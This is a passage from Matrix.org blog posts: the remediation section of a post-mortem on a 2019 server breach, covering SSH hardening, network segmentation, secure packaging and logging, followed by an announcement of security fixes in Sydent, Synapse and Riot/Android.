Another major problem factor was that individual SSH keys gave very broad access. We have gone through ensuring that SSH keys grant the least privilege required to the users in question. Particularly, root login should not be available over SSH.

A typical scenario where users might end up with unnecessary access to production are developers who simply want to push new code or check its logs. We are mitigating this by switching over to using continuous deployment infrastructure everywhere rather than developers having to actually SSH into production. For instance, the new matrix.org blog is continuously deployed into production by Buildkite from GitHub without anyone needing to SSH anywhere. Similarly, logs should be available to developers from a logserver in real time, without having to SSH into the actual production host. We’ve already been experimenting internally with sentry for this.

Relatedly, we’ve also shifted to requiring multiple SSH keys per user (per device, and for privileged / unprivileged access), to have finer grained granularity over locking down their permissions and revoking them etc. (We had actually already started this process, and while it didn’t help prevent the attack, it did assist with forensics).

🔗Two factor authentication

We are rolling out two-factor authentication for SSH to ensure that even if keys are compromised (e.g. via forwarding hijack), the attacker needs to have also compromised other physical tokens in order to successfully authenticate.

🔗It should be made as hard as possible to add malicious SSH keys

We’ve decided to stop users from being able to directly manage their own SSH keys in production via ~/.ssh/authorized_keys (or ~/.ssh/authorized_keys2 for that matter) - we can see no benefit from letting non-root users set keys.

Instead, keys for all accounts are managed exclusively by Ansible via /etc/ssh/authorized_keys/$account (using sshd’s AuthorizedKeysFile /etc/ssh/authorized_keys/%u directive).

🔗Changes to SSH keys should be carefully monitored

If we’d had sufficient monitoring of the SSH configuration, the breach could have been caught instantly. We are doing this by managing the keys exclusively via Ansible, and also improving our intrusion detection in general.

Similarly, we are working on tracking changes and additions to other credentials (and enforcing their complexity).

🔗SSH config should be hardened, disabling unnecessary options

If we’d gone through reviewing the default sshd config when we set up the datacenter in the first place, we’d have caught several of these failure modes at the outset. We’ve now done so (as per above).

We’d like to recommend that packages of openssh start having secure-by-default configurations, as a number of the old options just don’t need to exist on most newly provisioned machines.

🔗Network architecture

As mentioned in the History section, the legacy network infrastructure effectively grew organically, without really having a core network or a good split between different production environments.

We are addressing this by:

  • Splitting our infrastructure into strictly separated service domains, which are firewalled from each other and can only access each other via their respective ‘front doors’ (e.g. HTTPS APIs exposed at the loadbalancers).
    • Development
    • Intranet
    • Package Build (airgapped; see below for more details)
    • Package Distribution
    • Production, which is in turn split per class of service.
  • Access to these networks will be via VPN + SSH jumpboxes (as per above). Access to the VPN is via per-device certificate + 2FA, and SSH via keys as per above.
  • Switching to an improved internal VPN between hosts within a given network environment (i.e. we don’t trust the datacenter LAN).

We’re also running most services in containers by default going forwards (previously it was a bit of a mix of running unix processes, VMs, and occasional containers), providing an additional level of namespace isolation.

🔗Keeping patched

Needless to say, this particular breach would not have happened had we kept the public-facing Jenkins patched (although there would of course still have been scope for a 0-day attack).

Going forwards, we are establishing a formal regular process for deploying security updates rather than relying on spotting security advisories on an ad hoc basis. We are now also setting up regular vulnerability scans against production so we catch any gaps before attackers do.

Aside from our infrastructure, we’re also extending the process of regularly checking for security updates to also checking for outdated dependencies in our distributed software (Riot, Synapse, etc) too, given the discipline to regularly chase outdated software applies equally to both.

Moving all our machine deployment and configuration into Ansible allows this to be a much simpler task than before.

🔗Intrusion detection

There’s obviously a lot we need to do in terms of spotting future attacks as rapidly as possible. Amongst other strategies, we’re working on real-time log analysis for aberrant behaviour.

🔗Incident management

There is much we have learnt from managing an incident at this scale. The main highlights taken from our internal retrospective are:

  • The need for a single incident manager to coordinate the technical response and coordinate prioritisation and handover between those handling the incident. (We lacked a single incident manager at first, given several of the team started off that week on holiday...)
  • The benefits of gathering all relevant info and checklists onto a canonical set of shared documents rather than being spread across different chatrooms and lost in scrollback.
  • The need to have an existing inventory of services and secrets available for tracking progress and prioritisation
  • The need to have a general incident management checklist for future reference, which folks can familiarise themselves with ahead of time to avoid stuff getting forgotten. The sort of stuff which will go on our checklist in future includes:
    • Remembering to appoint named incident manager, external comms manager & internal comms manager. (They could of course be the same person, but the roles are distinct).
    • Defining a sensible sequence of forensics, mitigations, communication, rotating secrets etc is followed rather than having to work it out on the fly and risk forgetting stuff
    • Remembering to informing the ICO (Information Commissioner Office) of any user data breaches
    • Guidelines on how to balance between forensics and rebuilding (i.e. how long to spend on forensics, if at all, before pulling the plug)
    • Reminders to snapshot systems for forensics & backups
    • Reminder to not redesign infrastructure during a rebuild. There were a few instances where we lost time by seizing the opportunity to try to fix design flaws whilst rebuilding, some of which were avoidable.
    • Making sure that communication isn’t sent prematurely to users (e.g. we posted the blog post asking people to update their passwords before password reset had actually been restored - apologies for that.)

🔗Configuration management

One of the major flaws once the attacker was in our network was that our internal configuration git repo was cloned on most accounts on most servers, containing within it a plethora of unencrypted secrets. Config would then get symlinked from the checkout to wherever the app or OS needed it.

This is bad in terms of leaving unencrypted secrets (database passwords, API keys etc) lying around everywhere, but also in terms of being able to automatically maintain configuration and spot unauthorised configuration changes.

Our solution is to switch all configuration management, from the OS upwards, to Ansible (which we had already established for Modular.im), using Ansible vaults to store the encrypted secrets. It’s unfortunate that we had already done the work for this (and even had been giving talks at Ansible meetups about it!) but had not yet applied it to the legacy infrastructure.

🔗Avoiding temporary measures which last forever

None of this would have happened had we been more disciplined in finishing off the temporary infrastructure from back in 2017. As a general point, we should try and do it right the first time - and failing that, assign responsibility to someone to update it and assign responsibility to someone else to check. In other words, the only way to dig out of temporary measures like this is to project manage the update or it will not happen. This is of course a general point not specific to this incident, but one well worth reiterating.

🔗Secure packaging

One of the most unfortunate mistakes highlighted by the breach is that the signing keys for the Synapse debian repository, Riot debian repository and Riot/Android releases on the Google Play Store had ended up on hosts which were compromised during the attack. This is obviously a massive fail, and is a case of the geo-distributed dev teams prioritising the convenience of a near-automated release process without thinking through the security risks of storing keys on a production server.

Whilst the keys were compromised, none of the packages that we distribute were tampered with. However, the impact on the project has been high - particularly for Riot/Android, as we cannot allow the risk of an attacker using the keys to sign and somehow distribute malicious variants of Riot/Android, and Google provides no means of recovering from a compromised signing key beyond creating a whole new app and starting over. Therefore we have lost all our ratings, reviews and download counts on Riot/Android and started over. (If you want to give the newly released app a fighting chance despite this setback, feel free to give it some stars on the Play Store). We also revoked the compromised Synapse & Riot GPG keys and created new ones (and published new instructions for how to securely set up your Synapse or Riot debian repos).

In terms of remediation, designing a secure build process is surprisingly hard, particularly for a geo-distributed team. What we have landed on is as follows:

  • Developers create a release branch to signify a new release (ensuring dependencies are pinned to known good versions).
  • We then perform all releases from a dedicated isolated release terminal.
    • This is a device which is kept disconnected from the internet, other than when doing a release, and even then it is firewalled to be able to pull data from SCM and push to the package distribution servers, but otherwise entirely isolated from the network.
    • Needless to say, the device is strictly used for nothing other than performing releases.
    • The build environment installation is scripted and installs on a fresh OS image (letting us easily build new release terminals as needed)
    • The signing keys (hardware or software) are kept exclusively on this device.
    • The publishing SSH keys (hardware or software) used to push to the packaging servers are kept exclusively on this device.
    • We physically store the device securely.
    • We ensure someone on the team always has physical access to it in order to do emergency builds.
  • Meanwhile, releases are distributed using dedicated infrastructure, entirely isolated from the rest of production.
    • These live at https://packages.matrix.org and https://packages.riot.im
    • These are minimal machines with nothing but a static web-server.
    • They are accessed only via the dedicated SSH keys stored on the release terminal.
    • These in turn can be mirrored in future to avoid a SPOF (or we could cheat and use Cloudflare’s always online feature, for better or worse).

Alternatives here included:

  • In an ideal world we’d do reproducible builds instead, and sign the build’s hash with a hardware key, but given we don’t have reproducible builds yet this will have to suffice for now.
  • We could delegate building and distribution entirely to a 3rd party setup such as OBS (as per https://github.com/matrix-org/matrix.org/issues/370). However, we have a very wide range of artefacts to build across many different platforms and OSes, so would rather build ourselves if we can.

🔗Dev and CI infrastructure

The main change in our dev and CI infrastructure is to move from Jenkins to Buildkite. The latter has been serving us well for Synapse builds over the last few months, and has now been extended to serve all the main CI pipelines that Jenkins was providing. Buildkite works by orchestrating jobs on a elastic pool of CI workers we host in our own AWS, and so far has done so quite painlessly.

The new pipelines have been set up so that where CI needs to push artefacts to production for continuous deployment (e.g. riot.im/develop), it does so by poking production via HTTPS to trigger production to pull the artefact from CI, rather than pushing the artefact via SSH to production.

Other than CI, our strategy is:

  • Continue using Github for public repositories
  • Use gitlab.matrix.org for private repositories (and stuff which we don’t want to re-export via the US, like Olm)
  • Continue to host docker images on Docker Hub (despite their recent security dramas).

🔗Log minimisation and handling Personally Identifying Information (PII)

Another thing that the breach made painfully clear is that we log too much. While there’s not much evidence of the attacker going spelunking through any Matrix service log files, the fact is that whilst developing Matrix we’ve kept logging on matrix.org relatively verbose to help with debugging. There’s nothing more frustrating than trying to trace through the traffic for a bug only to discover that logging didn’t pick it up.

However, we can still improve our logging and PII-handling substantially:

  • Ensuring that wherever possible, we hash or at least truncate any PII before logging it (access tokens, matrix IDs, 3rd party IDs etc).
  • Minimising log retention to the bare minimum we need to investigate recent issues and abuse
  • Ensuring that PII is stored hashed wherever possible.

Meanwhile, in Matrix itself we already are very mindful of handling PII (c.f. our privacy policies and GDPR work), but there is also more we can do, particularly:

  • Turning on end-to-end encryption by default, so that even if a server is compromised, the attacker cannot get at private message history. Everyone who uses E2EE in Matrix should have felt some relief that even though the server was compromised, their message history was safe: we need to provide that to everyone. This is https://github.com/vector-im/riot-web/issues/6779.
  • We need device audit trails in Matrix, so that even if a compromised server (or malicious server admin) temporarily adds devices to your account, you can see what’s going on. This is https://github.com/matrix-org/synapse/issues/5145
  • We need to empower users to configure history retention in their rooms, so they can limit the amount of history exposed to an attacker. This is https://github.com/matrix-org/matrix-doc/pull/1763
  • We need to provide account portability (aka decentralised accounts) so that even if a server is compromised, the users can seamlessly migrate elsewhere. The first step of this is https://github.com/matrix-org/matrix-doc/pull/1228.

🔗Conclusion

Hopefully this gives a comprehensive overview of what happened in the breach, how we handled it, and what we are doing to protect against this happening in future.

Again, we’d like to apologise for the massive inconvenience this caused to everyone caught in the crossfire. Thank you for your patience and for sticking with the project whilst we restored systems. And while it is very unfortunate that we ended up in this situation, at least we should be coming out of it much stronger, at least in terms of infrastructure security. We’d also like to particularly thank Kade Morton for providing independent review of this post and our remediations, and everyone who reached out with #hugops during the incident (it was literally the only positive thing we had on our radar), and finally thanks to the those of the Matrix team who hauled ass to rebuild the infrastructure, and also those who doubled down meanwhile to keep the rest of the project on track.

On which note, we’re going to go back to building decentralised communication protocols and reference implementations for a bit... Emoji reactions are on the horizon (at last!), as is Message Editing, RiotX/Android and a host of other long-awaited features - not to mention finally releasing Synapse 1.0. So: thanks again for flying Matrix, even during this period of extreme turbulence and, uh, hijack. Things should mainly be back to normal now and for the foreseeable.

Given the new blog doesn't have comments yet, feel free to discuss the post over at HN.

Security updates: Sydent 1.0.3, Synapse 0.99.3.1 and Riot/Android 0.9.0 / 0.8.99 / 0.8.28a

03.05.2019 00:00 — General Matthew Hodgson

Hi all,

Over the last few weeks we’ve ended up getting a lot of attention from the security research community, which has been incredibly useful and massively appreciated in terms of contributions to improve the security of the reference Matrix implementations.

We’ve also set up an official Security Disclosure Policy to explain the process of reporting security issues to us safely via responsible disclosure - including a Hall of Fame to credit those who have done so. (Please mail [email protected] to remind us if we’ve forgotten you!).

Since we published the Hall of Fame yesterday, we’ve already been getting new entries and so we’re doing a set of security releases today to ensure they are mitigated asap. Unfortunately the work around this means that we’re running late in publishing the post mortem of the Apr 11 security incident - we are trying to get that out as soon as we can.

🔗Sydent 1.0.3

Sydent 1.0.3 has three security fixes:

  • Ensure that authentication tokens are generated using a secure random number generator, ensuring they cannot be predicted by an attacker. This is an important fix - please update. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing the issue!
  • Mitigate an HTML injection bug where an invalid room_id could result in malicious HTML being injected into validation emails. The fix for this is in the email template itself; you will need to update any customised email templates to be protected. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!
  • Randomise session_ids to avoid leaking info about the total number of identity validations, and whether a given ID has been validated. Thanks to @fs0c131y for identifying and responsibly disclosing this one.

If you are running Sydent as an identity server, you should update as soon as possible from https://github.com/matrix-org/sydent/releases/v1.0.3. We are not aware of any of these issues having been exploited maliciously in the wild.

🔗Synapse 0.99.3.1

Synapse 0.99.3.1 is a security update for two fixes:

  • Ensure that random IDs in Synapse are generated using a secure random number generator, ensuring they cannot be predicted by an attacker. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue!
  • Add 0.0.0.0/32 and ::/128 to the URL preview blacklist configuration, ensuring that an attacker cannot make connections to localhost. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!

You can update from https://github.com/matrix-org/synapse/releases or similar as normal. We are not aware of any of these issues having been exploited maliciously in the wild.

(Synapse 0.99.3.2 was released shortly afterwards to fix a non-security issue with the Debian packaging)

🔗Riot/Android 0.9.x/0.8.99 (Google Play) and 0.8.28a (F-Droid)

Riot/Android has an important security fix which shipped over the course of the last week in various versions of the app:

  • Remove obsolete and buggy ContentProvider which could allow a malicious local app to compromise account data. Many thanks to Julien Thomas (@julien_thomas) from Protektoid Project for identifying this and responsibly disclosing it!

The fix for this shipped on F-Droid since 0.8.28a, and on the Play Store, the fix is present in both v0.9.0 (the first version of the re-published Riot app) and v0.8.99 (the last version of the old Riot app, which told everyone to reinstall). Other forks of Riot which we’re aware of have also been informed and should be updated.

If you haven’t already updated, please do so now.